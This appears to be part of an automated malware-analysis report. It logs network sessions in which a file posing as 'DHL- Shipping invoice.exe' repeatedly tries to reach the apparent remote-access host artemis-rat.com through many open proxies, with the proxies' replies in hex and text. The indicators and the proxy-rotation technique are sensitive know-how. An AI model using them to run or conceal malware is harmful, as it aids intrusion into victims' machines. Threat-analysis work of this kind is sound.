                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1393192.168.2.45413889.168.121.17531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.124078989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.974137068 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1394192.168.2.45413394.131.14.6610816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.126825094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1395192.168.2.45423538.162.0.12631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.128812075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.462568045 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1396192.168.2.453683104.18.251.208806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.135860920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.222747087 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1397192.168.2.454155190.96.97.20241536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.140783072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1398192.168.2.45417718.135.211.18231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.144264936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.304132938 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1399192.168.2.45419382.113.157.122312806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.146868944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1400192.168.2.454165147.75.34.85100076484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.154699087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.321240902 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1401192.168.2.45424512.186.205.121806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.159781933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.285919905 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.1
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1402192.168.2.454161190.97.238.849996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.160247087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.740916014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.361648083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640944004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932694912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250189066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508563042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.047306061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.131669998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1403192.168.2.454190162.214.225.223434356484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.162580967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765594959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359467030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453468084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.563090086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.765764952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1404192.168.2.4542013.122.84.9931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.166249990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.340903997 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1405192.168.2.45415420.206.106.19281236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.170831919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.413873911 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1406192.168.2.45417137.27.32.80806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.172203064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1407192.168.2.454263104.25.114.28806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.181561947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.269018888 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1408192.168.2.45380283.118.211.14031296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.183126926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765615940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359693050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.264482021 CET536INHTTP/1.1 503 Service Unavailable
                            Server: squid/4.10
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 08:01:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3819
                            X-Squid-Error: ERR_DNS_FAIL 0
                            Vary: Accept-Language
                            Content-Language: en
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1409192.168.2.45424951.15.240.207163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.195434093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.765594006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250550985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.266081095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250257015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250155926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250104904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.062588930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.640732050 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1410192.168.2.45270950.63.13.3149206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.198098898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.204519033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250128031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.250336885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.249804974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:41.249818087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.249759912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:17.249845028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:05.421732903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1411192.168.2.454276146.19.106.194123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.206382990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
